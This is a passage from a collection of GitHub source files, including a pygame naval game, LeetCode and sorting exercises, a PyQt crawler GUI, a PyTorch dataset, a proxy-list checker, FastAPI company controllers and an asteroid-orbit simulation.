{})\".format(\r\n self.name, self.x, self.y, ship.name, ship.x, ship.y))\r\n return False\r\n elif pos[0] == ship.x:\r\n if pos[1] >= ship.y - (self.get_size() - 1) and pos[0] <= ship.y + ship.size - 1:\r\n print(\r\n \"Could not move ship {} (pos {} {}) because its colliding with ship {} (pos {} {})\".format(\r\n self.name, self.x, self.y, ship.name, ship.x, ship.y))\r\n return False\r\n\r\n return True\r\n\r\n def get_ship_list_cords(self, Player, p, get_ship = False):\r\n ship_list = []\r\n try:\r\n ships = Player.get_saved_ships()\r\n except AttributeError:\r\n ships = [Player]\r\n\r\n for ship in ships:\r\n if ship == self:\r\n continue\r\n\r\n full_ship = []\r\n if(ship.check_if_vertical()):\r\n for i in range(ship.get_size()):\r\n full_ship.append((ship.x, p(ship.y, i)))\r\n else:\r\n for i in range(ship.get_size()):\r\n full_ship.append((p(ship.x, i), ship.y))\r\n\r\n if(get_ship):\r\n ship_list.append({\r\n 'ship': ship,\r\n 'coords': full_ship\r\n })\r\n else:\r\n ship_list.append(full_ship)\r\n\r\n return ship_list\r\n\r\n def get_ship(self):\r\n full_ship = []\r\n 
for i in range(self.get_size()):\r\n if(self.check_if_vertical()):\r\n full_ship.append((self.x, self.y + i))\r\n else:\r\n full_ship.append((self.x + i, self.y))\r\n\r\n return full_ship\r\n\r\n def check_colsion(self, player1, player2):\r\n\r\n ships_player_1 = self.get_ship_list_cords(player1, lambda x, y: x + y, False)\r\n ships_player_2 = self.get_ship_list_cords(player2, lambda x, y: x + y, False)\r\n\r\n ship = self.get_ship()\r\n\r\n for ship_player_1 in ships_player_1:\r\n if(set(ship_player_1).intersection(set(ship))):\r\n return True\r\n\r\n for ship_player_2 in ships_player_2:\r\n if(set(ship_player_2).intersection(set(ship))):\r\n return True \r\n\r\n return False\r\n\r\n\r\n def locate_enemy_ships(self, Turn, Enemy):\r\n Player = Turn.get_player()\r\n if self.check_if_vertical():\r\n ship_range = self.offensive_range\r\n else:\r\n ship_range = self.defensive_range\r\n\r\n enemy_ship_list = self.get_ship_list_cords(Enemy, lambda x, y: x + y, True)\r\n\r\n ship_range_cords = []\r\n\r\n for i in range(ship_range + 1):\r\n if(self.check_if_vertical()):\r\n # top\r\n ship_range_cords.append((self.x, self.y - i))\r\n # bottom\r\n ship_range_cords.append((self.x, (self.y + self.size) + i)) \r\n else:\r\n # top \r\n ship_range_cords.append((self.x - i, self.y))\r\n # bottom\r\n ship_range_cords.append(((self.x + self.size) + i, self.y))\r\n\r\n for a in range(self.size):\r\n if(self.check_if_vertical()):\r\n # left \r\n ship_range_cords.append((self.x - i, self.y + a))\r\n # right\r\n ship_range_cords.append((self.x + i, self.y + a))\r\n else:\r\n # left \r\n ship_range_cords.append((self.x + a, self.y - i))\r\n # right\r\n ship_range_cords.append((self.x + a, self.y - i)) \r\n\r\n ships_in_range = []\r\n for enemy_ship in enemy_ship_list:\r\n if(set(enemy_ship['coords']).intersection(set(ship_range_cords))):\r\n ships_in_range.append(enemy_ship['ship'])\r\n\r\n return ships_in_range\r\n\r\n\r\n def movement(self, event, player1, player2, Other_player = None):\r\n\r\n chkgame = sounds.sounds.check_gamesound()\r\n \"\"\"Allows for movement on the grid\"\"\"\r\n # if select:\r\n # print(\"You selected: \" + self.name)\r\n # print(str(self.move_ship) + \" move(s) left for this ship.\")\r\n if(Other_player):\r\n mines = Other_player.get_mines() \r\n \"\"\"Loops through until select returns false\"\"\"\r\n\r\n if self.move_ship > 0:\r\n if self.vertical == True and not self.dead and not self.deactivated:\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_UP:\r\n if chkgame == True:\r\n sounds.Sounds().waves()\r\n self.y -= 1\r\n self.move_ship -= 1\r\n self.direction = 1\r\n if(self.check_colsion(player1, player2) or self.y < 1):\r\n self.y +=1\r\n self.move_ship += 1\r\n time.sleep(0.15) \r\n elif event.key == pygame.K_LEFT:\r\n if chkgame == True:\r\n sounds.Sounds().waves()\r\n self.x -= 1\r\n self.move_ship -= 1\r\n self.direction = 2\r\n if(self.check_colsion(player1, player2) or self.x < 1):\r\n self.x += 1\r\n self.move_ship += 1\r\n\r\n time.sleep(0.15) \r\n elif event.key == pygame.K_RIGHT:\r\n if chkgame == True:\r\n sounds.Sounds().waves()\r\n self.x += 1\r\n self.move_ship -= 1\r\n self.direction = 3\r\n if(self.check_colsion(player1, player2) or self.x > 20):\r\n self.x -= 1\r\n self.move_ship += 1\r\n\r\n time.sleep(0.15) \r\n elif event.key == pygame.K_DOWN:\r\n if chkgame == True:\r\n sounds.Sounds().waves()\r\n self.y += 1\r\n self.move_ship -= 1\r\n self.direction = 4\r\n if(self.check_colsion(player1, player2) or self.y > (21 - self.get_size())):\r\n 
self.y -= 1\r\n self.move_ship += 1\r\n\r\n time.sleep(0.15) \r\n elif event.key == pygame.K_l:\r\n if player1.get_id() == 1:\r\n if chkgame == True:\r\n sounds.Sounds().turn_defensive_red()\r\n else:\r\n if chkgame == True:\r\n sounds.Sounds().turn_defensive_blue()\r\n self.move_ship -= 1\r\n self.turn_ship()\r\n if(self.check_colsion(player1, player2) or self.x > (21 - self.get_size())):\r\n self.move_ship += 1\r\n self.turn_ship() \r\n time.sleep(0.15)\r\n elif self.vertical == False and not self.dead:\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_l:\r\n if player1.get_id() == 1:\r\n if chkgame == True:\r\n sounds.Sounds().turn_offensive_red()\r\n else:\r\n if chkgame == True:\r\n sounds.Sounds().turn_offensive_blue()\r\n self.move_ship -= 1\r\n self.turn_ship()\r\n if(self.check_colsion(player1, player2)):\r\n self.move_ship += 1\r\n self.turn_ship()\r\n\r\n time.sleep(0.15)\r\n\r\n # check if ship hits a mine\r\n ship = self.get_ship()\r\n for mine in mines:\r\n if(set([mine]).intersection(set(ship))):\r\n Other_player.delete_mine(mine)\r\n dead = self.take_damage(1)\r\n if(dead):\r\n return dead\r\n if chkgame == True:\r\n sounds.Sounds().biem()\r\n\r\n def position(self):\r\n \"\"\"Turns ship 180 degrees, allowing for offensive and defensive positioning\"\"\"\r\n self.x = self.x - 1\r\n self.y = self.y\r\n\r\n def get_health(self):\r\n return self.health\r\n\r\n def add_health(self, health):\r\n self.health += health\r\n\r\n def get_moves(self):\r\n return self.move_ship\r\n\r\n def add_moves(self, moves):\r\n self.move_ship += moves\r\n\r\n def get_name(self):\r\n return self.name\r\n\r\n def get_offensive_range(self):\r\n return self.offensive_range\r\n\r\n def add_offensive_range(self, number):\r\n self.offensive_range += number\r\n\r\n def get_defensive_range(self):\r\n return self.defensive_range\r\n\r\n def add_defensive_range(self, number):\r\n self.defensive_range += number\r\n\r\n def add_range(self, number):\r\n self.add_offensive_range(number)\r\n self.add_defensive_range(number)\r\n\r\n def get_damage(self):\r\n return self.damage\r\n\r\n def add_damage(self, number):\r\n self.damage += number\r\n\r\n def take_damage(self, number):\r\n self.health -= number\r\n if(self.health <= 0):\r\n self.image = self.dead_image\r\n self.dead = True\r\n return self.dead\r\n\r\n def check_if_dead(self):\r\n return self.dead\r\n\r\n def add_attack_count(self, number):\r\n self.attack_count += number\r\n\r\n def subtract_attack_count(self, number):\r\n self.attack_count -= number\r\n\r\n def get_attack_count(self):\r\n return self.attack_count\r\n\r\n def get_image(self):\r\n return self.image\r\n\r\n def check_if_vertical(self):\r\n return self.vertical\r\n\r\n def turn_ship(self):\r\n if self.vertical:\r\n self.vertical = False\r\n else:\r\n self.vertical = True\r\n\r\nclass Saltire(MainShip):\r\n \"\"\"Furgo Saltire & Santa Bettina class.\"\"\"\r\n def __init__(self, name, x, y, color = 'red'):\r\n super().__init__(name, x, y, color)\r\n self.name = name\r\n self.x = x -100\r\n self.y = y\r\n self.health = 2\r\n self.size = 2\r\n self.move_ship = 3\r\n self.offensive_range = 2\r\n self.defensive_range = 3\r\n self.damage = 1\r\n self.attack_count = 1\r\n self.ship_number = 1\r\n if(color == 'red'):\r\n self.image = \"assets/boats/BoatR_1.png\"\r\n else:\r\n self.image = \"assets/boats/BoatB_1.png\"\r\n\r\n self.dead_image = \"assets/boats/BoatG_1.png\"\r\n self.dead = False \r\n self.deactivate = False\r\n self.deactivated = False\r\n def get_ship_number(self):\r\n 
return self.ship_number\r\n def reset(self):\r\n self.move_ship = 3\r\n self.offensive_range = 2\r\n self.defensive_range = 3\r\n self.damage = 1\r\n self.attack_count = 1\r\n self.unset_deactivate()\r\n self.unset_deactivated()\r\n\r\nclass Windsurf(MainShip):\r\n \"\"\"Silver Whisper, Windsurf, Sea Spirit & Intensity class\"\"\"\r\n def __init__(self, name, x, y, color = 'red'):\r\n super().__init__(name, x, y, color)\r\n self.name = name\r\n self.x = x - 100\r\n self.y = y\r\n self.health = 3\r\n self.size = 3\r\n self.move_ship = 2\r\n self.offensive_range = 3\r\n self.defensive_range = 4\r\n self.damage = 1\r\n self.attack_count = 1\r\n self.ship_number = 2\r\n if(color == 'red'):\r\n self.image = \"assets/boats/BoatR_2.png\" \r\n else:\r\n self.image = \"assets/boats/BoatB_2.png\"\r\n\r\n self.dead_image = \"assets/boats/BoatG_2.png\"\r\n self.dead = False\r\n self.deactivate = False\r\n self.deactivated = False \r\n\r\n def reset(self):\r\n self.move_ship = 2\r\n self.offensive_range = 3\r\n self.defensive_range = 4\r\n self.damage = 1\r\n self.attack_count = 1\r\n self.unset_deactivate()\r\n self.unset_deactivated()\r\n\r\nclass Amadea(MainShip):\r\n \"\"\"Amadea & Merapi class\"\"\"\r\n def __init__(self, name, x, y, color = 'red'):\r\n super().__init__(name, x, y, color)\r\n self.name = name\r\n self.x = x - 100\r\n self.y = y\r\n self.health = 4\r\n self.size = 4\r\n self.move_ship = 1\r\n self.offensive_range = 4\r\n self.defensive_range = 5\r\n self.damage = 1\r\n self.attack_count = 1\r\n self.ship_number = 3\r\n if(color == 'red'):\r\n self.image = \"assets/boats/BoatR_3.png\"\r\n else:\r\n self.image = \"assets/boats/BoatB_3.png\"\r\n\r\n self.dead_image = \"assets/boats/BoatG_3.png\"\r\n self.dead = False\r\n self.deactivate = False\r\n self.deactivated = False\r\n\r\n def reset(self):\r\n self.move_ship = 1\r\n self.offensive_range = 4\r\n self.defensive_range = 5\r\n self.damage = 1\r\n self.attack_count = 1\r\n self.unset_deactivate()\r\n self.unset_deactivated()\r\n\r\n","repo_name":"sanderbakker/Project-2-Battleport-INF1F-Groep-2","sub_path":"modules/ships.py","file_name":"ships.py","file_ext":"py","file_size_in_byte":16546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"18838020608","text":"import collections\r\nclass Solution:\r\n def findMaxLength1(self, nums) -> int:\r\n print(nums)\r\n res = 0\r\n idx = 0\r\n chk_lst = []\r\n while(idx < len(nums)):\r\n bin_ctr = 1\r\n check_val = nums[idx]\r\n print(\"chek \", idx)\r\n for i in range(idx + 1 , len(nums)):\r\n if(nums[i] == check_val):\r\n bin_ctr +=1\r\n else:\r\n break\r\n sub_idx = bin_ctr+bin_ctr\r\n print(\"idx \" , idx)\r\n sub_arr = nums[bin_ctr:bin_ctr+bin_ctr]\r\n print(\"sub_arr :\" , sub_arr)\r\n \r\n print(\"lst :\" , chk_lst)\r\n if check_val == 0 :\r\n if(sub_arr.count(1) == bin_ctr and len(chk_lst) == 0 and sub_arr != chk_lst):\r\n print(sub_arr , \" :: \" ,chk_lst , \" :: \" ,sub_idx)\r\n res +=sub_idx\r\n else: \r\n if(sub_arr.count(0) == bin_ctr and len(chk_lst) == 0 and sub_arr != chk_lst):\r\n print(\"else :: \" ,sub_arr , \" :: \" ,chk_lst , \" :: \" ,sub_idx)\r\n res +=1\r\n \r\n if sub_arr not in chk_lst:\r\n chk_lst.append(sub_arr)\r\n idx += 1\r\n return res\r\n \r\n\r\n def findMaxLength(self, nums) -> int:\r\n dict_subarr = collections.defaultdict(int)\r\n max_length = 0\r\n count = 0\r\n dict_subarr[0] = -1\r\n for i in range(0 , len(nums)):\r\n print(\"ele :: \" , nums[i])\r\n if nums[i] == 0:\r\n count -= 1 \r\n else:\r\n count += 1 \r\n print(\"count value :: \" , count)\r\n\r\n if(count in dict_subarr.keys()):\r\n print(\"dict keys :: \" , dict_subarr.keys())\r\n print(\"dict vals :: \" , dict_subarr.values())\r\n print(\"max_length :: \" , max_length)\r\n print(\"vallll :: , iteration num \", i ,\" :: \" , \"key ::\" ,count , \":: dict \", dict_subarr[count] ,\"sub ::\" , i- dict_subarr[count])\r\n max_length = max(max_length , i-dict_subarr[count])\r\n \r\n else:\r\n dict_subarr[count] = i\r\n return max_length\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nprint(Solution().findMaxLength([0,1,0,0,1,1,0]))","repo_name":"uthambathoju/30days_leetcode_april_challenge","sub_path":"contiguos_array.py","file_name":"contiguos_array.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"27088379729","text":"import numpy as np\r\nimport time\r\n\r\ndef insertionSort(veriMiktari):\r\n veriDizini = np.random.randint(0, 100000, veriMiktari)\r\n copyveriDizini = veriDizini.copy()\r\n start = time.time()\r\n islemSayisi = 0\r\n \r\n for i in range(1, veriMiktari):\r\n islemSayisi +=2\r\n key = veriDizini[i]\r\n j = i - 1\r\n \r\n while 0 <= j and key < veriDizini[j]:\r\n islemSayisi += 3\r\n veriDizini[j + 1] = veriDizini[j]\r\n j -= 1\r\n veriDizini[j + 1] = key\r\n \r\n return veriDizini, islemSayisi, time.time()-start, copyveriDizini","repo_name":"Mahmut-OGUTCU/Algoritma_Analizi_ve_Tasarimi","sub_path":"SiralamaAlgoritmalari/insertionSort.py","file_name":"insertionSort.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"69"}
+{"seq_id":"18295869942","text":"import os\nimport sys\n\nfrom PyQt5 import QtCore\nfrom PyQt5.QtCore import QThread, pyqtSignal, QEventLoop, QTimer\nfrom PyQt5.QtGui import QTextCursor\nfrom PyQt5.QtWidgets import QWidget, QTextEdit, QVBoxLayout, QHBoxLayout, QPushButton, QLineEdit, QCheckBox, \\\n QFileDialog, QMessageBox, QGroupBox, QApplication\nfrom KSVS_Moudle.utils.KSVS import runGetUserDetail,runGetUserId\nfrom KSVS_Moudle.utils.DataGrid import DataGrid\n\nclass UserDetailThread(QThread):\n user_detail_signal = pyqtSignal(str)\n def __init__(self,data=None, parent=None):\n super(UserDetailThread, self).__init__(parent)\n self.data = data\n\n def write(self, text):\n self.user_detail_signal.emit(str(text)) # 发射信号\n\n def run(self):\n runGetUserId()\n print(\"userID抓取完成,开始抓取用户信息\")\n runGetUserDetail()\n print(\"用户信息抓取完成\")\n self.exit(0) # 关闭线程\n def stop(self):\n os._exit(0)\nclass getUserDetailTab(QWidget):\n def __init__(self):\n super(getUserDetailTab, self).__init__()\n self.resize(500,300)\n self.initUI()\n\n def initUI(self):\n self.processBar()\n self.process = QTextEdit(self, readOnly=True)\n self.process.ensureCursorVisible()\n self.process.setLineWrapColumnOrWidth(1000)\n self.process.setLineWrapMode(QTextEdit.FixedPixelWidth)\n main_layout = QVBoxLayout()\n main_layout.addLayout(self.process_layout)\n main_layout.addWidget(self.process)\n self.setLayout(main_layout)\n def dataBox(self):\n self.data_box = QGroupBox(\"数据\",self)\n self.data_box.setFlat(True)\n data_layout = QVBoxLayout()\n self.show_file_layout = QHBoxLayout()\n self.process_file_layout = QHBoxLayout()\n self.filePathlineEdit = QLineEdit(self)\n self.filePathlineEdit.setObjectName(\"filePathlineEdit\")\n self.open_file_button = QPushButton(\"导入数据\", self)\n self.open_file_button.clicked.connect(self.openFile)\n self.check_import_box = QCheckBox(self)\n from KSVS_Moudle.utils.importToDb import KSUserData\n if KSUserData.table_exists():\n self.check_import_box.setChecked(True)\n self.open_file_button.setDisabled(True)\n else:\n self.check_import_box.setChecked(False)\n self.open_file_button.setDisabled(False)\n self.check_import_box.setDisabled(True)\n self.show_file_layout.addWidget(self.filePathlineEdit)\n self.show_file_layout.addWidget(self.check_import_box)\n clean_db_button = QPushButton(\"清空数据\",self)\n clean_db_button.clicked.connect(self.cleanFile)\n self.process_file_layout.addWidget(self.open_file_button)\n self.process_file_layout.addWidget(clean_db_button)\n self.process_file_layout.addStretch(0.1)\n self.process_file_layout.setSpacing(20)\n\n data_layout.addLayout(self.show_file_layout)\n data_layout.addLayout(self.process_file_layout)\n data_layout.setSpacing(10)\n self.data_box.setLayout(data_layout)\n\n def runBox(self):\n run_layout = QVBoxLayout()\n self.run_box = QGroupBox(\"运行\",self)\n self.run_box.setFlat(True)\n show_user_detail_button = QPushButton(\"查看用户信息\", self)\n show_user_detail_button.clicked.connect(self.showUserDetail)\n get_user_detail_button = QPushButton(\"开始抓取\", self)\n get_user_detail_button.clicked.connect(self.crawlUserDetail)\n run_layout.addWidget(self.data_box)\n run_layout.addWidget(get_user_detail_button)\n run_layout.addWidget(show_user_detail_button)\n # self.top_layout.addWidget(stop_user_detail_button)\n run_layout.setSpacing(10)\n self.run_box.setLayout(run_layout)\n def processBar(self):\n self.dataBox()\n self.runBox()\n self.process_layout = QHBoxLayout()\n self.process_layout.addWidget(self.data_box)\n self.process_layout.addWidget(self.run_box)\n 
self.process_layout.setStretch(0,3)\n self.process_layout.setStretch(1,1)\n def openFile(self):\n # self.filePathlineEdit.setText(str(get_directory_path))\n self.get_filename_path, ok = QFileDialog.getOpenFileName(self,\n \"选取单个文件\",\n \"../basicdata\",\n \"All Files (*);;Text Files (*.txt)\")\n if ok:\n self.filePathlineEdit.setText(str(self.get_filename_path))\n from KSVS_Moudle.utils.importToDb import importUserName2Db\n import_success = importUserName2Db(str(self.get_filename_path))\n if import_success:\n QMessageBox.information(self,\"提示\",\"成功导入数据!\",QMessageBox.Ok)\n self.check_import_box.setChecked(True)\n else:\n QMessageBox.information(self, \"提示\", \"导入失败,请检查数据!\",QMessageBox.Ok)\n self.check_import_box.setChecked(False)\n def cleanFile(self):\n from KSVS_Moudle.utils.importToDb import db,KSUserData,KSVideoData\n db.drop_tables((KSUserData,KSVideoData))\n if not db.table_exists(KSUserData) and not db.table_exists(KSVideoData):\n QMessageBox.information(self, \"提示\", \"数据已清空!\")\n self.check_import_box.setChecked(False)\n self.open_file_button.setDisabled(False)\n def onUpdateUserDetailText(self, text):\n cursor = self.process.textCursor()\n cursor.movePosition(QTextCursor.End)\n cursor.insertText(text)\n self.process.setTextCursor(cursor)\n self.process.ensureCursorVisible()\n\n def crawlUserDetail(self):\n try:\n self.user_detail_th = UserDetailThread()\n self.user_detail_th.user_detail_signal.connect(self.onUpdateUserDetailText)\n sys.stdout = self.user_detail_th\n self.user_detail_th.start()\n except Exception as e:\n raise e\n loop = QEventLoop()\n QTimer.singleShot(2000, loop.quit)\n loop.exec_()\n def showUserDetail(self):\n self.dg = DataGrid(\"用户信息\",\"KSUserData\")\n self.dg.show()\n def stopCrawlUserDetail(self):\n # self.user_detail_th.stop()\n os._exit(0)\n def changeEvent(self, a0: QtCore.QEvent) -> None:\n pass\n # def closeEvent(self, event):\n # \"\"\"Shuts down application on close.\"\"\"\n # # Return stdout to defaults.\n # sys.stdout = sys.__stdout__\n # super().closeEvent(event)","repo_name":"nuclear-turning/spider","sub_path":"KSVS_WX/KSVS_Moudle/tabs/GetUserDetailTab.py","file_name":"GetUserDetailTab.py","file_ext":"py","file_size_in_byte":6668,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"70680015901","text":"import os\r\nimport torch\r\nimport cv2\r\nimport torch.utils.data.dataset\r\nfrom pandas import DataFrame\r\nfrom pathlib import Path\r\nfrom typing import Tuple\r\n\r\nfrom transforms import transform\r\nfrom sklearn.preprocessing import LabelEncoder\r\nfrom torchvision import datasets, models, transforms\r\nfrom PIL import Image\r\n\r\nclass Classification_Dataset(torch.utils.data.Dataset):\r\n def __init__(self,\r\n dataframe=None,\r\n labels:dict ={},\r\n trans=None,\r\n shuffle: bool = True,\r\n tile_size: Tuple = (256,256),\r\n show_image: bool = False,\r\n ):\r\n \r\n self.dataframe = dataframe\r\n self.labels = labels\r\n self.trans = trans\r\n self.shuffle = shuffle\r\n self.tile_size = tile_size\r\n self.show_image = show_image\r\n self.label_enc = LabelEncoder()\r\n self.label_enc.fit(list(self.labels.values()))\r\n\r\n def __len__(self):\r\n return len(self.dataframe.index)\r\n\r\n def __getitem__(self, idx):\r\n item = self.dataframe.iloc[idx]\r\n img_path = item['path']\r\n convert_to_tensor = transforms.ToTensor()\r\n img = cv2.cvtColor(cv2.imread(img_path), cv2.COLOR_BGR2RGB)\r\n tensor_img = convert_to_tensor(img)\r\n\r\n if self.trans:\r\n img = self.trans(tensor_img)\r\n\r\n label = self.label_enc.transform([item['label']])\r\n # print(\"image shape\", img.shape, \"label:\" ,[item['label']])\r\n # print(\"label shape : \" ,label.shape)\r\n\r\n return {'image': img,\r\n 'label': torch.tensor(label, dtype=torch.long)\r\n }\r\n\r\n\r\n\r\n","repo_name":"Er3en/image_classification","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"11726408433","text":"from sys import stdin\n\ns_in = list(stdin.readline().strip())\n\nsum = 0\nfor a in s_in:\n sum += (ord(a.upper()) - 64)\n# print(sum)\nis_prime = True\nfor i in range(2, sum):\n if sum % i == 0:\n is_prime = False\n\nprint('It is a prime word.') if is_prime else print('It is not a prime word.')\n","repo_name":"sejongkang/Baekjoon_programming","sub_path":"8.소수/2153_소수단어.py","file_name":"2153_소수단어.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"40065499314","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n__author__ = \"Nikolay Nezhevenko \"\n\n\nimport os\n\nfrom lib.parseproxytables import parse_free_proxy_list_net, parse_freeproxylists_net,\\\n parse_hidemy_name, parse_proxylist_hidemyass_com, save_proxy_list\nfrom lib.check_proxies import main as check_proxies_main\n\n\nCONFIG = {\n 'data_path': './data',\n 'storage_path': './storage',\n 'temp_file_with_all_proxies': 'all_proxies.txt',\n 'free_proxy_list_net_file': 'new_proxies.free-proxy-list.net.txt',\n 'freeproxylists_net_file': 'new_proxies.freeproxylists.net.txt',\n 'hidemy_name_file': 'new_proxies.hidemy.name.txt',\n 'proxylist_hidemyass_com_file': 'new_proxies.proxylist.hidemyass.com.txt',\n 'url_for_check': \"http://stackoverflow.com/questions\",\n 'timeout': \"5\",\n 'threads': \"16\"\n}\n\n\ndef get_total_proxy_list():\n all_proxies = list()\n all_proxies.extend(parse_free_proxy_list_net(os.path.join(CONFIG['data_path'], CONFIG['free_proxy_list_net_file'])))\n all_proxies.extend(parse_freeproxylists_net(os.path.join(CONFIG['data_path'], CONFIG['freeproxylists_net_file'])))\n all_proxies.extend(parse_hidemy_name(os.path.join(CONFIG['data_path'], CONFIG['hidemy_name_file'])))\n all_proxies.extend(parse_proxylist_hidemyass_com(os.path.join(CONFIG['data_path'], CONFIG['proxylist_hidemyass_com_file'])))\n\n return sorted(list(set(all_proxies)))\n\n\ndef print_total_proxy_list(proxies):\n for proxy in proxies:\n print(proxy)\n\n\nif __name__ == '__main__':\n proxies = get_total_proxy_list()\n print('Total proxy count to validate: %s' % len(proxies))\n save_proxy_list(proxies, os.path.join(CONFIG['storage_path'], CONFIG['temp_file_with_all_proxies']))\n check_proxies_main([\"-file\", os.path.join(CONFIG['storage_path'], CONFIG['temp_file_with_all_proxies']),\n \"-url\", CONFIG['url_for_check'],\n \"-timeout\", CONFIG['timeout'],\n \"-threads\", CONFIG['threads']\n ])\n print(\"See result.txt for check new proxy list\")\n","repo_name":"nekey/stackoverflowscrapper","sub_path":"proxy_list/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"25380001077","text":"from userService.v1.models import User\r\nfrom companyService.v1.models import Company, Company_User\r\nfrom fastapi import Depends\r\nfrom config.database import database\r\nfrom typing import Dict\r\nfrom sqlalchemy.sql.expression import exists, select, insert, update, and_\r\n\r\n\r\nclass CompanyController:\r\n async def create_company(self, company: Dict) -> int:\r\n query = insert(Company).values(**company)\r\n return await database.execute(query)\r\n\r\n async def invite_representative(self, company: int, user: int):\r\n query = insert(Company_User).values(company=company, user=user)\r\n return await database.execute(query)\r\n\r\n async def get_invite(self, company: int, user: int):\r\n query = select(Company_User).where(\r\n and_(Company_User.company == company, Company_User.user == user)\r\n )\r\n return await database.fetch_one(query)\r\n\r\n async def accept_invite(self, company: int, user: int):\r\n query = (\r\n update(Company_User)\r\n .values({\"accepted\": True})\r\n .where(\r\n and_(Company_User.company == company, Company_User.user == user)\r\n )\r\n )\r\n return await database.execute(query)\r\n\r\n @staticmethod\r\n async def check_invite(company: int, user: int):\r\n query = select(Company_User).where(\r\n and_(\r\n Company_User.company == company,\r\n Company_User.user == user,\r\n Company_User.accepted == False,\r\n )\r\n )\r\n query = select(exists(query))\r\n return await database.execute(query)\r\n\r\n @staticmethod\r\n async def check_related(company: int, user: int):\r\n query = select(Company_User).where(\r\n and_(\r\n Company_User.company == company,\r\n Company_User.user == user,\r\n Company_User.accepted == True,\r\n )\r\n )\r\n query = select(exists(query))\r\n return await database.execute(query)\r\n\r\n @staticmethod\r\n async def get_company_by_id(id: int) -> Company:\r\n query = select(Company).where(Company.id == id)\r\n return await database.fetch_one(query)\r\n\r\n @staticmethod\r\n async def check_company_by_id(id: int) -> bool:\r\n query = select(Company).where(Company.id == id)\r\n return await database.execute(select(exists(query)))\r\n","repo_name":"ghimire007/omnecal","sub_path":"companyService/v1/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"21529965481","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Nov 20 13:33:31 2016\n\n@author: Hugh\n\"\"\"\n\nimport scipy as sp\nimport numpy as np\nimport pylab as pl\nimport scipy.integrate as spi\nimport matplotlib.pyplot as plt\n\nG=6.67*(10**-11)\nM=9.98*10**12\nM_small=4.22*10**12\nM_large=5.76*10**12\nR_small=1100\nR_large=1220\nm=260\nrestitution=0.7\n\ndef f(r,t):\n\n xx=r[0]\n vx=r[1]\n yy=r[2]\n vy=r[3]\n ax=-((G*M_small*(r[0]-1659)/((r[0]-1659)**2 + r[2]**2)**1.5)+(G*M_large*(r[0]+660)/((r[0]+660)**2 + r[2]**2)**1.5))\n ay=-((G*M_small*r[2]/((r[0]-1659)**2 + r[2]**2)**1.5)+(G*M_large*r[2]/((r[0]+660)**2 + r[2]**2)**1.5))\n return [vx,ax,vy,ay]\n\nt=sp.linspace(0.,500000.,50000)\nvi=-0.599\nvj=-0.03\nx0=22473\ny0=1100\nxx0=[x0,vi,y0,vj]\n\n\nsoln=spi.odeint(f,xx0,t)\nx=soln[:,0]\nv1=soln[:,1]\ny=soln[:,2]\nv2=soln[:,3]\n\n\nr_small=((x-1659)**2+y**2)**0.5\nr_large=((x+660)**2+y**2)**0.5\n\ndef cut(m,n):\n i=0\n while m[i]-n > 0:\n i+=1\n i=i-1\n xa=x[:i+1]\n ya=y[:i+1]\n return [xa,ya,i]\n\nx_1collision=cut(r_small,R_small)[0][-1]\ny_1collision=cut(r_small,R_small)[1][-1]\n \nif min(r_small) < R_small: \n i=cut(r_small,R_small)[2]\n Positionx_collision=x[i]-1659\n Positiony_collision=y[i]\n Calculation=((v1[i]*Positionx_collision)+(v2[i]*Positiony_collision))/(Positionx_collision**2+Positiony_collision**2)\n Vx_normal=Calculation*Positionx_collision\n Vy_normal=Calculation*Positiony_collision\n Vx_tangent=v1[i]-Vx_normal\n Vy_tangent=v2[i]-Vy_normal\n Vx_aftercollision=Vx_tangent-Vx_normal*restitution\n Vy_aftercollision=Vy_tangent-Vy_normal*restitution\n xx0_new=[x[i],Vx_aftercollision,y[i],Vy_aftercollision]\n \n t_new=t+t[i]\n soln_new=spi.odeint(f,xx0_new,t_new)\n \n x_new=soln_new[:,0]\n vx_new=soln_new[:,1]\n y_new=soln_new[:,2]\n vy_new=soln_new[:,3]\n r_small_new=((x_new-1659)**2+y_new**2)**0.5\n \n \n \n \n if min(r_small_new) 0:\n i+=1\n i=i-1\n x_new=x_new[:i+1]\n y_new=y_new[:i+1]\n \n \n \n x=np.concatenate((cut(r_small,R_small)[0],x_new),axis=0)\n y=np.concatenate((cut(r_small,R_small)[1],y_new),axis=0)\n \n \n Positionx_collision=x_new[i]-1659\n Positiony_collision=y_new[i]\n Calculation=((vx_new[i]*Positionx_collision)+(vy_new[i]*Positiony_collision))/(Positionx_collision**2+Positiony_collision**2)\n Vx_normal=Calculation*Positionx_collision\n Vy_normal=Calculation*Positiony_collision\n Vx_tangent=vx_new[i]-Vx_normal\n Vy_tangent=vy_new[i]-Vy_normal\n Vx_aftercollision=Vx_tangent-Vx_normal*restitution\n Vy_aftercollision=Vy_tangent-Vy_normal*restitution\n xx0_new=[x_new[i],Vx_aftercollision,y_new[i],Vy_aftercollision]\n \n \n t_new=t+t_new[i]\n soln_new=spi.odeint(f,xx0_new,t_new)\n x_new=soln_new[:,0]\n vx_new=soln_new[:,1]\n y_new=soln_new[:,2]\n vy_new=soln_new[:,3]\n r_small_new=((x_new-1659)**2+y_new**2)**0.5\n \n if min(r_small_new)= 0:\n i+=1\n \n 